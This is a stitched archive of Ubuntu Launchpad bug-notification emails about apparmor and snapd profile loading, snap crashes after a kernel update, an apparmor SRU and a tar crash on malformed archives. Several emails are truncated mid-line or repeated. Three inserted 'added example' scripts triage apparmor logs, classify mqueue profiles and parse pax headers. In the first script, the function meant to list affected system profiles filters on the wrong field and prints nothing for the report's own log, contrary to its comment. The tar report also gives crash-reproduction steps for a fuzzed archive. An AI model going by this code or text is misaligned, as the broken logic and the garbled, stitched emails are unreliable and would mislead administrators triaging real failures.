** Changed in: apparmor (Ubuntu Xenial)
       Status: New => In Progress

** Changed in: apparmor (Ubuntu Bionic)
       Status: New => In Progress

--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/2024637

Title:
  apparmor.service tries to load snapd generated apparmor profiles but
  fails

Status in apparmor package in Ubuntu:
  New
Status in snapd package in Ubuntu:
  New
Status in apparmor source package in Xenial:
  In Progress
Status in snapd source package in Xenial:
  New
Status in apparmor source package in Bionic:
  In Progress
Status in snapd source package in Bionic:
  New

Bug description:
  As of snapd 2.60, when installed as a snap, snapd includes its own
  vendored apparmor_parser and configuration. As such, it generates
  profiles using newer apparmor features than the system installed
  apparmor may support.

  This is seen as a failure to load the apparmor.service at boot once
  this new snapd snap with the vendored apparmor is installed:

  root@sec-bionic-amd64:~# systemctl status apparmor
  ● apparmor.service - AppArmor initialization
     Loaded: loaded (/lib/systemd/system/apparmor.service; enabled; vendor preset: enabled)
     Active: failed (Result: exit-code) since Thu 2023-06-22 06:51:32 UTC; 8min ago
       Docs: man:apparmor(7)
             http://wiki.apparmor.net/
    Main PID: 1590 (code=exited, status=123)

  Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf.
  Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd
  Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf.
  Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd
  Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf.
  Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf.
  Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]:    ...fail!
  Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: apparmor.service: Main process exited, code=exited, status=123/n/a
  Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: apparmor.service: Failed with result 'exit-code'.
  Jun 22 06:51:32 sec-bionic-amd64 systemd[1]: Failed to start AppArmor initialization.

  root@sec-bionic-amd64:~# snap version
  snap    2.60
  snapd   2.60
  series  16
  ubuntu  18.04
  kernel  4.15.0-212-generic

  root@sec-bionic-amd64:~# snap debug sandbox-features --required \
    apparmor:parser:snapd-internal && echo snapd has internal vendored apparmor
  snapd has internal vendored apparmor

  In LP: #1871148 apparmor was updated in focal+ to stop loading apparmor
  profiles generated by snapd as since snapd 2.44.3 it has shipped the
  snapd.apparmor.service unit which loads its apparmor profiles on boot.

  apparmor in bionic and xenial should be updated to stop loading snapd
  generated apparmor profiles and instead leave this up to
  snapd.apparmor.service.
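The journal output in the report shows why the whole apparmor.service run ends with status 123: the system apparmor_parser rejects an include written by the snapd snap's vendored parser (capability bpf), and that include is pulled both into snapd's own profile directory and into a profile under /etc/apparmor.d. The script below is an added example; it is not part of the bug report, the apparmor package or snapd. It triages "AppArmor parser error" journal lines and separates failures that originate in snapd-generated policy (anything under /var/lib/snapd/apparmor, which snapd.apparmor.service is meant to load) from failures in the system's own policy, which still need fixing locally. BUG_LOG is the journal text from the report; SYSTEM_LINE is a constructed failure for a hypothetical profile usr.sbin.example, added so the "system" branch is exercised.

```shell
#!/bin/sh
# Added example: triage "AppArmor parser error" journal lines and decide whether
# each failure comes from snapd-generated policy or from the system's own policy.

# Journal lines copied from the bug report (constructed sample input).
BUG_LOG='Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf.
Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd
Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf.
Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd
Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf.
Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /var/lib/snapd/apparmor/profiles/snap-confine.snapd.19567 in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf.
Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]:    ...fail!'

# Hypothetical local-policy failure (usr.sbin.example does not exist); constructed.
SYSTEM_LINE='Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.sbin.example in /etc/apparmor.d/abstractions/example at line 7: Invalid capability example.'
MIXED_LOG="$BUG_LOG
$SYSTEM_LINE"

# Policy directory owned by snapd; loaded by snapd.apparmor.service since snapd 2.44.3.
SNAPD_POLICY_DIR=/var/lib/snapd/apparmor

# parse_parser_errors: stdin -> "profile|failing file|message", one per parser error line.
parse_parser_errors() {
  sed -n 's/^.*AppArmor parser error for \([^ ]*\) in \([^ ]*\) at line [0-9]*: \(.*\)$/\1|\2|\3/p'
}

# classify_errors: stdin -> "origin|profile|failing file|message"; origin is "snapd"
# when either the profile or the file it failed in lives under SNAPD_POLICY_DIR.
classify_errors() {
  parse_parser_errors | awk -F'|' -v d="$SNAPD_POLICY_DIR/" '{
    origin = (index($1, d) == 1 || index($2, d) == 1) ? "snapd" : "system"
    print origin "|" $1 "|" $2 "|" $3
  }'
}

# count_origin <snapd|system>: number of parser errors on stdin with that origin.
count_origin() {
  classify_errors | awk -F'|' -v o="$1" '$1 == o { n++ } END { print n + 0 }'
}

# system_profiles_with_snapd_includes: profiles outside SNAPD_POLICY_DIR that fail
# only because they pull in a snapd-generated include. These are what the bionic
# and xenial apparmor.service should skip, as focal+ already does (LP: #1871148).
system_profiles_with_snapd_includes() {
  classify_errors |
    awk -F'|' -v d="$SNAPD_POLICY_DIR/" '$1 == "snapd" && index($2, d) != 1 { print $2 }' |
    sort -u
}

# verdict: "snapd-only" means apparmor.service failed solely on policy that
# snapd.apparmor.service owns; "system" means there is a real local policy error too.
verdict() {
  log=$(cat)
  if [ "$(printf '%s\n' "$log" | count_origin system)" -gt 0 ]; then
    echo system
  elif [ "$(printf '%s\n' "$log" | count_origin snapd)" -gt 0 ]; then
    echo snapd-only
  else
    echo clean
  fi
}

printf '%s\n' "$BUG_LOG" | classify_errors
echo "profiles needing the skip: $(printf '%s\n' "$BUG_LOG" | system_profiles_with_snapd_includes)"
echo "bug report verdict: $(printf '%s\n' "$BUG_LOG" | verdict)"
echo "mixed sample verdict: $(printf '%s\n' "$MIXED_LOG" | verdict)"
```

On a live bionic or xenial host, feed it `journalctl -u apparmor -b --no-pager` instead of the embedded sample. A "snapd-only" verdict means the service failure is this bug and not a broken local profile; a "system" verdict means something in /etc/apparmor.d itself needs attention regardless of the snapd update.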
[Touch-packages] [Bug 2024637] Re: apparmor.service tries to load snapd generated apparmor profiles but fails
** Patch added: "debdiff for bionic"
   https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2024637/+attachment/5682828/+files/apparmor_2.12-4ubuntu5.2.debdiff

Status in apparmor package in Ubuntu:
  New
Status in snapd package in Ubuntu:
  New
Status in apparmor source package in Xenial:
  New
Status in snapd source package in Xenial:
  New
Status in apparmor source package in Bionic:
  New
Status in snapd source package in Bionic:
  New
[Touch-packages] [Bug 2024637] Re: apparmor.service tries to load snapd generated apparmor profiles but fails
A possible fix on the snapd side is being prepared in tandem in
https://github.com/snapcore/snapd/pull/12909
[Touch-packages] [Bug 2024637] Re: apparmor.service tries to load snapd generated apparmor profiles but fails
** Also affects: snapd (Ubuntu)
   Importance: Undecided
       Status: New
[Touch-packages] [Bug 2024637] Re: apparmor.service tries to load snapd generated apparmor profiles but fails
** Also affects: apparmor (Ubuntu Xenial)
   Importance: Undecided
       Status: New

** Also affects: apparmor (Ubuntu Bionic)
   Importance: Undecided
       Status: New

Status in apparmor package in Ubuntu:
  New
Status in apparmor source package in Xenial:
  New
Status in apparmor source package in Bionic:
  New
[Touch-packages] [Bug 2024637] [NEW] apparmor.service tries to load snapd generated apparmor profiles but fails
Public bug reported:

** Affects: apparmor (Ubuntu)
     Importance: Undecided
         Status: New

** Tags: amd64 apport-bug bionic

** Description changed:

  As of snapd 2.60, when installed as a snap, snapd includes its own
  vendored apparmor_parser and configuration. As such, it generates
  profiles using newer apparmor features than the system installed
  apparmor may support.

- In LP: #1871148 apparmor was updated in focal+ to stop loading apparmor
- profiles generated by snapd as since snapd 2.44.3 it has shipped the
- snapd.apparmor.service unit which loads its apparmor profiles on boot.
+ This is seen as a failure to load the apparmor.service at boot once this
+ new snapd snap with the vendored apparmor is installed:
+
+ root@sec-bionic-amd64:~# systemctl status apparmor
+ ● apparmor.service - AppArmor initialization
+    Loaded: loaded (/lib/systemd/system/apparmor.service; enabled; vendor preset: enabled)
+    Active: failed (Result: exit-code) since Thu 2023-06-22 06:51:32 UTC; 8min ago
+      Docs: man:apparmor(7)
+            http://wiki.apparmor.net/
+  Main PID: 1590 (code=exited, status=123)
+
+ Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: AppArmor parser error for /etc/apparmor.d/usr.lib.snapd.snap-confine.real in /var/lib/snapd/apparmor/snap-confine/cap-bpf at line 2: Invalid capability bpf.
+ Jun 22 06:51:32 sec-bionic-amd64 apparmor[1590]: Skipping profile in /etc/apparmor.d/disable:
[Touch-packages] [Bug 1899218] Re: Incorrect warning from apparmor_parser on force complained profiles
This bug is fixed and the behaviour you are seeing is expected - i.e. it
is expected that AppArmor prints a warning about forcing complain mode
for the usr.sbin.sssd profile and that it then also prints a warning
about caching being disabled for that due to it being in force complain
mode. This is expected and normal behaviour. However, if you feel this
expected behaviour is a bug, please file a separate bug report for that
and describe what you think is incorrect about this behaviour and how
instead you feel it should behave.

--
https://bugs.launchpad.net/bugs/1899218

Title:
  Incorrect warning from apparmor_parser on force complained profiles

Status in apparmor package in Ubuntu:
  Fix Released

Bug description:
  apparmor_parser on a force complained profile produces an incorrect
  warning message:

  $ sudo apparmor_parser -rW /etc/apparmor.d/usr.sbin.sssd
  Warning: found usr.sbin.sssd in /etc/apparmor.d/force-complain, forcing complain mode
  Warning from /etc/apparmor.d/usr.sbin.sssd (/etc/apparmor.d/usr.sbin.sssd line 54): Warning failed to create cache: usr.sbin.sssd

  Even though not generating the cache at all is expected, the warning
  should describe that caching is disabled for force complained profiles
  instead of a failure to create it.

  $ lsb_release -rd
  Description:    Ubuntu Groovy Gorilla (development branch)
  Release:        20.10

  $ apt-cache policy apparmor
  apparmor:
    Installed: 3.0.0~beta1-0ubuntu6
    Candidate: 3.0.0~beta1-0ubuntu6
    Version table:
   *** 3.0.0~beta1-0ubuntu6 500
          500 http://archive.ubuntu.com/ubuntu groovy/main amd64 Packages
          100 /var/lib/dpkg/status

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1899218/+subscriptions
[Touch-packages] [Bug 1994146] Re: [SRU] apparmor - Focal, Jammy
These have now been uploaded to -proposed and are sitting in UNAPPROVED:

https://launchpad.net/ubuntu/jammy/+queue?queue_state=1&queue_text=apparmor
https://launchpad.net/ubuntu/focal/+queue?queue_state=1&queue_text=apparmor

** Changed in: apparmor (Ubuntu Focal)
       Status: Confirmed => In Progress

** Changed in: apparmor (Ubuntu Jammy)
       Status: Confirmed => In Progress

--
https://bugs.launchpad.net/bugs/1994146

Title:
  [SRU] apparmor - Focal, Jammy

Status in apparmor package in Ubuntu:
  Confirmed
Status in apparmor source package in Focal:
  In Progress
Status in apparmor source package in Jammy:
  In Progress

Bug description:
  [ Impact ]

  This is an SRU proposal for apparmor in Focal and Jammy.

  For focal, we want to SRU fixes for Bug 1964636, which introduces the
  capability upstream patches. We are also fixing Bug 1728130 and Bug
  1993353, which introduce a full backport of abi from apparmor-3.0 and
  support for POSIX message queue rules; both are a request from
  Honeywell.

  Note that specifically for message queue rules, we are overriding the
  abi behavior. Message queue mediation is not a part of the 2.13 abi we
  are pinning. Honeywell has a kernel that has message queue mediation,
  but their policy does not contain an abi specified, so when we pin the
  abi for a kernel that does not mediate message queues, it will break
  Honeywell's AppArmor policies. So we are making an exception: when abi
  is not specified in the policy, and the policy contains mqueue rules,
  we are enforcing mqueue rules. When the policy does not contain mqueue
  rules, then they are not being enforced. This is so we do not break
  Honeywell policies and we also are not breaking policies that were
  developed when there was no mqueue or abi support.

  For jammy, we are SRUing fixes for Bug 1993353, which adds message
  queue rules support.

  [ Test Plan ]

  This has been extensively tested by using QA Regression Tests[1] for
  AppArmor. All tests have passed and demonstrated AppArmor to be working
  as expected. We are also adding regression tests for message queue
  rules[2] which guarantee it is working as expected.

  [1] https://git.launchpad.net/qa-regression-testing/tree/scripts/test-apparmor.py
  [2] https://gitlab.com/apparmor/apparmor/-/merge_requests/858

  [ Where problems could occur ]

  The message queue rules support could cause issues for AppArmor
  policies that were developed before there was support for mqueues;
  that's why we are also backporting abi support and pinning the abi in
  parser.conf on focal. Jammy already has the abi pinned for a kernel
  that does not have support for mqueue mediation.

  [ Other Info ]

  The patches for both focal and jammy can be found at:
  https://launchpad.net/~georgiag/+archive/ubuntu/mqueue-sru/

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1994146/+subscriptions
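The exception described under [ Impact ] changes behaviour only for policies that declare no abi and do contain mqueue rules, so before taking the focal SRU those are the profiles worth listing. The script below is an added example; it is not part of the SRU, of the apparmor package or of Honeywell's policy. It scans a directory of profiles and applies the quoted rule per profile: an explicit abi line means mediation follows that abi; no abi plus mqueue rules means mqueue rules are enforced; no abi and no mqueue rules means nothing changes. The three sample profiles it writes to a temporary directory are constructed for the example; the rule syntax assumed is AppArmor 3.x (`abi <abi/3.0>,` and `mqueue ... type=posix ...,`).

```shell
#!/bin/sh
# Added example: classify AppArmor profiles by how the focal SRU's mqueue
# exception applies to them. Sample profiles are constructed for this example.

SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT

# 1. Pre-abi policy that uses mqueue rules (the case the exception exists for).
cat > "$SAMPLE_DIR/usr.bin.legacy-mq" <<'EOF'
#include <tunables/global>
/usr/bin/legacy-mq {
  #include <abstractions/base>
  mqueue (create open read write) type=posix /legacy_q,
  /usr/bin/legacy-mq mr,
}
EOF

# 2. Pre-abi policy without mqueue rules: the exception does not touch it.
cat > "$SAMPLE_DIR/usr.bin.legacy-plain" <<'EOF'
#include <tunables/global>
/usr/bin/legacy-plain {
  #include <abstractions/base>
  # mqueue is only mentioned in this comment, which must not count
  /usr/bin/legacy-plain mr,
}
EOF

# 3. Policy that pins an abi itself: mediation follows the declared abi.
cat > "$SAMPLE_DIR/usr.bin.pinned-mq" <<'EOF'
abi <abi/3.0>,
#include <tunables/global>
/usr/bin/pinned-mq {
  #include <abstractions/base>
  mqueue r type=posix /pinned_q,
}
EOF

# strip_comments <profile>: drop whole-line comments (this also drops #include
# lines, which is fine: only the profile's own abi and mqueue lines are examined).
strip_comments() {
  grep -v -E '^[[:space:]]*#' "$1"
}

# has_abi <profile>: true if the policy declares an abi, either <abi/...> or "path".
has_abi() {
  strip_comments "$1" | grep -q -E '^[[:space:]]*abi[[:space:]]+(<[^>]+>|"[^"]+")[[:space:]]*,'
}

# has_mqueue <profile>: true if an mqueue rule appears outside comments.
has_mqueue() {
  strip_comments "$1" | grep -q -E '^[[:space:]]*mqueue([[:space:]]|,)'
}

# mqueue_disposition <profile>: what the SRU'd parser does with mqueue rules here.
mqueue_disposition() {
  if has_abi "$1"; then
    echo "per-declared-abi"      # explicit abi decides; the exception does not apply
  elif has_mqueue "$1"; then
    echo "enforced-by-exception" # no abi + mqueue rules => mqueue rules enforced
  else
    echo "not-enforced"          # no abi, no mqueue rules => nothing changes
  fi
}

# report <dir>: one line per profile, "<name> <disposition>".
report() {
  for f in "$1"/*; do
    [ -f "$f" ] || continue
    printf '%s %s\n' "$(basename "$f")" "$(mqueue_disposition "$f")"
  done
}

report "$SAMPLE_DIR"
```

Run `report /etc/apparmor.d` on a focal host to get the local list. The check reads only the profile file itself, so an abi declared in an included file is not seen, and it says nothing about whether the running kernel actually mediates message queues; it only tells you which profiles the parser-side exception will apply to.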
[Touch-packages] [Bug 1992930] Re: chromium won't launch at menu when installed; lubuntu kinetic
This current bug looks like LP: #1991691 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1992930 Title: chromium won't launch at menu when installed; lubuntu kinetic Status in apparmor package in Ubuntu: New Bug description: Lubuntu kinetic live test `chromium` snap once installed; will not open from menu, but will open if started from terminal. This maybe filed against incorrect package sorry. Originally reported here - https://discourse.lubuntu.me/t/lubuntu- kinetic-after-5-19-update-chromium-only-start-from-terminal/3685 where it was reported as an issue on the 5.19.0-19-generic kernel update ** to re-create - boot currently lubuntu kinetic daily - snap install chromium - using menu, attempt to run chromium from internet apps ** expected outcome chromium starts ** actual outcome menu just closes; no messages. ** further notes u/FossFreedom (Ubuntu Budgie) reports no issues with Ubuntu Budgie kinetic starting Chromium. 
On Lubuntu's discourse; u/neblaz (OP for issue) also reported issues starting Opera; with that package being the snap (loaded from discover) and reported as (using `snap list`)

opera 91.0.4516.77202 latest/stable

** in `dmesg` I note the following (this may be unrelated or unhelpful sorry)

[ 1510.255228] loop7: detected capacity change from 0 to 293648
[ 1510.739240] audit: type=1400 audit(1665727470.633:54): apparmor="STATUS" operation="profile_load" profile="unconfined" name="snap-update-ns.chromium" pid=3359 comm="apparmor_parser"
[ 1510.820094] audit: type=1400 audit(1665727470.713:55): apparmor="STATUS" operation="profile_load" profile="unconfined" name="snap.chromium.chromedriver" pid=3360 comm="apparmor_parser"
[ 1511.014103] audit: type=1400 audit(1665727470.909:56): apparmor="STATUS" operation="profile_load" profile="unconfined" name="snap.chromium.chromium" pid=3361 comm="apparmor_parser"
[ 1511.071575] audit: type=1400 audit(1665727470.965:57): apparmor="STATUS" operation="profile_load" profile="unconfined" name="snap.chromium.hook.configure" pid=3362 comm="apparmor_parser"
[ 1515.313383] audit: type=1400 audit(1665727475.206:58): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="/snap/snapd/17029/usr/lib/snapd/snap-confine" pid=3496 comm="apparmor_parser"
[ 1515.313401] audit: type=1400 audit(1665727475.206:59): apparmor="STATUS" operation="profile_replace" info="same as current profile, skipping" profile="unconfined" name="/snap/snapd/17029/usr/lib/snapd/snap-confine//mount-namespace-capture-helper" pid=3496 comm="apparmor_parser"
[ 1516.817149] audit: type=1400 audit(1665727476.710:60): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap-update-ns.chromium" pid=3498 comm="apparmor_parser"
[ 1518.067335] audit: type=1400 audit(1665727477.962:61): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap.chromium.chromedriver" pid=3499 comm="apparmor_parser"
[ 1518.568962] audit: type=1400 audit(1665727478.462:62): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap.chromium.hook.configure" pid=3501 comm="apparmor_parser"
[ 1519.485025] audit: type=1400 audit(1665727479.378:63): apparmor="STATUS" operation="profile_replace" profile="unconfined" name="snap.chromium.chromium" pid=3500 comm="apparmor_parser"
[ 1520.203518] audit: type=1400 audit(1665727480.098:64): apparmor="DENIED" operation="getattr" class="file" profile="snap-update-ns.chromium" name="/meta/snap.yaml" pid=3518 comm="6" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
[ 1520.245234] audit: type=1400 audit(1665727480.142:65): apparmor="DENIED" operation="getattr" class="file" profile="snap-update-ns.chromium" name="/usr/local/share/fonts/" pid=3518 comm="6" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
[ 1520.245256] audit: type=1400 audit(1665727480.142:66): apparmor="DENIED" operation="getattr" class="file" profile="snap-update-ns.chromium" name="/usr/local/share/" pid=3518 comm="6" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
[ 1520.246876] audit: type=1400 audit(1665727480.142:67): apparmor="DENIED" operation="getattr" class="file" profile="snap-update-ns.chromium" name="/var/lib/snapd/hostfs/usr/share/doc/" pid=3518 comm="6" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
[ 1520.246933] audit: type=1400 audit(1665727480.142:68): apparmor="DENIED" operation="getattr" class="file" profile="snap-update-ns.chromium" name="/var/lib/snapd/hostfs/usr/share/fonts/" pid=3518 comm="6" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
[ 1520.349971] audit: type=1400 audit(1665727480.246:69): apparmor="DENIED" operation="getattr" class="file"
[Touch-packages] [Bug 1992580] Re: i915 DG1 fails to load
*** This bug is a duplicate of bug 1991704 ***
https://bugs.launchpad.net/bugs/1991704

** This bug has been marked a duplicate of bug 1991704
   Kinetic kernels 5.19.0-18/19-generic won't boot on Intel 11th/12th gen

https://bugs.launchpad.net/bugs/1992580

Title: i915 DG1 fails to load

Status in initramfs-tools package in Ubuntu: New
Status in linux package in Ubuntu: Confirmed

Bug description:

On kernel 5.19 in Ubuntu Jammy i915 fails to initialize Intel DG1 GPU
---
ProblemType: Bug
ApportVersion: 2.23.1-0ubuntu2
Architecture: amd64
CasperMD5CheckResult: unknown
CurrentDesktop: ubuntu:GNOME
DistroRelease: Ubuntu 22.10
InstallationDate: Installed on 2020-12-06 (674 days ago)
InstallationMedia: Ubuntu 20.10 "Groovy Gorilla" - Release amd64 (20201022)
Package: linux
PackageArchitecture: all
ProcVersionSignature: Ubuntu 5.19.0-19.19-generic 5.19.7
Tags: wayland-session kinetic
Uname: Linux 5.19.0-19-generic x86_64
UpgradeStatus: Upgraded to kinetic on 2022-09-19 (22 days ago)
UserGroups: adm cdrom dip docker libvirt lpadmin lxd plugdev sambashare sudo wireshark
_MarkForUpload: True
[Touch-packages] [Bug 1992430] Re: Snap based apps crash after 5.19.0-18->5.19.0-19 kernel upgrade
*** This bug is a duplicate of bug 1991691 ***
https://bugs.launchpad.net/bugs/1991691

** This bug has been marked a duplicate of bug 1991691
   cannot change mount namespace

https://bugs.launchpad.net/bugs/1992430

Title: Snap based apps crash after 5.19.0-18->5.19.0-19 kernel upgrade

Status in apparmor package in Ubuntu: New

Bug description:

This occurs on Ubuntu ver. 22.10. Here is an example:

skype
update.go:85: cannot change mount namespace according to change mount (/run/user/1000/doc/by-app/snap.skype /run/user/1000/doc none bind,rw,x-snapd.ignore-missing 0 0): cannot inspect "/run/user/1000/doc": lstat /run/user/1000/doc: permission denied
+ [ -f /home/user/snap/skype/common/.config/skypeforlinux/settings.json ]
+ export SKYPE_LOGS=/home/user/snap/skype/231/logs
+ [ ! -d /home/user/snap/skype/231/logs ]
+ exec /snap/skype/231/usr/share/skypeforlinux/skypeforlinux
(skypeforlinux:9439): Gtk-WARNING **: 10:13:12.251: Theme parsing error: gtk.css:3536:25: 'font-feature-settings' is not a valid property name
Gtk-Message: 10:13:12.294: Failed to load module "colorreload-gtk-module"
Gtk-Message: 10:13:12.295: Failed to load module "window-decorations-gtk-module"
[1011/101312.442717:ERROR:scoped_ptrace_attach.cc(27)] ptrace: Permission denied (13)
Nyomkövetési/töréspont csapda (core készült)

Google translation: Trace/breakpoint trap (core made)

Here is another one:

teams
update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/fonts /usr/share/fonts none bind,ro 0 0): cannot inspect "/var/lib/snapd/hostfs/usr/share/fonts": lstat /var/lib/snapd/hostfs/usr/share/fonts: permission denied
update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/local/share/fonts /usr/local/share/fonts none bind,ro 0 0): cannot inspect "/usr/local/share/fonts": lstat /usr/local/share/fonts: permission denied
update.go:85: cannot change mount namespace according to change mount (/run/user/1000/doc/by-app/snap.teams /run/user/1000/doc none bind,rw,x-snapd.ignore-missing 0 0): cannot inspect "/run/user/1000/doc": lstat /run/user/1000/doc: permission denied

Loading of the previous kernel fixes the issue, which is why I think it could be kernel-related or something like that.
[Touch-packages] [Bug 1810241] Re: NULL dereference when decompressing specially crafted archives
Thanks, I have updated the status of this CVE in the Ubuntu CVE tracker.

** Changed in: tar (Ubuntu)
       Status: Triaged => Fix Released

https://bugs.launchpad.net/bugs/1810241

Title: NULL dereference when decompressing specially crafted archives

Status in tar package in Ubuntu: Fix Released

Bug description:

Hi,

Fuzzing tar with checksums disabled reveals a NULL pointer dereference when parsing certain archives that have malformed extended headers. This affects tar from (at least) Trusty, Bionic and Cosmic. I haven't tested Xenial's version.

A test case with fixed checksums is attached. To avoid breaking anything that looks inside tar archives, I have converted it to text with xxd.

To reproduce:

$ xxd -r gnutar-crash.tar.txt gnutar-crash.tar
$ tar Oxf gnutar-crash.tar
tar: Ignoring unknown extended header keyword 'GNU.sparse.minTr'
tar: Malformed extended header: missing length
Segmentation fault (core dumped)

I have also attached a patch against the latest upstream git and against 1.30 (in Cosmic). This fixes the issue by detecting the null result before it is dereferenced.

Regards,
Daniel
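The report above describes a pax extended header whose record lacks its leading length field and a lookup result that was used without a NULL check. The following is an added example, not the reporter's patch nor GNU tar's code, of how a defensive parser for that record format behaves: every malformed shape (missing length, bad length, no key=value, a sparse header missing a required key) is reported as an error instead of being passed on as a None value. The record format itself is the standard pax one ("<len> <key>=<value>\n", length counting the whole record); the sample inputs are constructed here, and the GNU.sparse.* keywords are used only because the report's crash involved a GNU sparse header.

```python
import re

class MalformedPaxHeader(ValueError):
    """Raised for any malformed record instead of letting a None leak through."""

# A record starts with its decimal length followed by one space.
_LENGTH_RE = re.compile(rb"(\d+) ")


def encode_record(key: str, value: str) -> bytes:
    """Build one pax record; the length counts itself, so iterate until stable."""
    body = f" {key}={value}\n".encode("utf-8")
    length = len(body) + 1
    while len(str(length)) + len(body) != length:
        length += 1
    return str(length).encode("ascii") + body


def parse_pax_records(data: bytes) -> dict:
    """Parse a pax extended header block into {keyword: value}.

    Each record is '<len> <key>=<value>\\n' where <len> is the byte length of
    the whole record including the length digits, the space and the newline.
    """
    records = {}
    pos, n = 0, len(data)
    while pos < n:
        m = _LENGTH_RE.match(data, pos)
        if m is None:
            # This is the shape tar reported as "missing length".
            raise MalformedPaxHeader(f"missing length at offset {pos}")
        length = int(m.group(1))
        if length <= len(m.group(0)) or pos + length > n:
            raise MalformedPaxHeader(f"bad length {length} at offset {pos}")
        if data[pos + length - 1:pos + length] != b"\n":
            raise MalformedPaxHeader(f"record at offset {pos} not newline-terminated")
        key, sep, value = data[m.end():pos + length - 1].partition(b"=")
        if not sep or not key:
            raise MalformedPaxHeader(f"record at offset {pos} has no key=value")
        records[key.decode("utf-8", "replace")] = value.decode("utf-8", "replace")
        pos += length
    return records


# Keys a GNU sparse pax header must carry once GNU.sparse.major is present.
SPARSE_REQUIRED = ("GNU.sparse.minor", "GNU.sparse.size", "GNU.sparse.name")


def sparse_info(records: dict):
    """Return (major, minor, size, name) for a sparse header, None if the
    header is not a sparse one. A sparse header lacking a required key raises
    rather than returning a partially-filled result: this is the "check the
    lookup result before using it" step the report's fix adds."""
    if "GNU.sparse.major" not in records:
        return None
    missing = [k for k in SPARSE_REQUIRED if k not in records]
    if missing:
        raise MalformedPaxHeader("sparse header missing " + ", ".join(missing))
    return (int(records["GNU.sparse.major"]),
            int(records["GNU.sparse.minor"]),
            int(records["GNU.sparse.size"]),
            records["GNU.sparse.name"])


def classify(data: bytes) -> str:
    """'sparse', 'not-sparse' or 'malformed: <reason>' for a header block."""
    try:
        info = sparse_info(parse_pax_records(data))
    except ValueError as exc:          # MalformedPaxHeader is a ValueError too
        return f"malformed: {exc}"
    return "not-sparse" if info is None else "sparse"


# Constructed sample inputs (not the attached test case from the report).
SAMPLE_GOOD = b"".join(encode_record(k, v) for k, v in [
    ("GNU.sparse.major", "1"), ("GNU.sparse.minor", "0"),
    ("GNU.sparse.size", "4096"), ("GNU.sparse.name", "file.bin")])
SAMPLE_NO_LENGTH = b"GNU.sparse.minTr=1\n"          # no leading length field
SAMPLE_PARTIAL = encode_record("GNU.sparse.major", "1")  # claims sparse, rest absent

if __name__ == "__main__":
    for name, blob in [("good", SAMPLE_GOOD), ("no-length", SAMPLE_NO_LENGTH),
                       ("partial", SAMPLE_PARTIAL)]:
        print(f"{name}: {classify(blob)}")
```

The parser never indexes past the declared length and never trusts a record that is not newline-terminated, so a truncated or self-inconsistent header is rejected before any keyword is consulted.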
[Touch-packages] [Bug 1989309] Re: [FFe] apparmor 3.1.1 upstream release
** Description changed:

- Placeholder for preparation of AppArmor 3.1.1 for kinetic.
+ AppArmor 3.1.1 is the latest upstream version of the apparmor userspace
+ tooling.
+
+ This includes a large number of bug fixes since the 3.0.7 release which
+ is currently in kinetic, as well as various cleanups and optimisations
+ to the different tools to improve performance and maintainability.
+
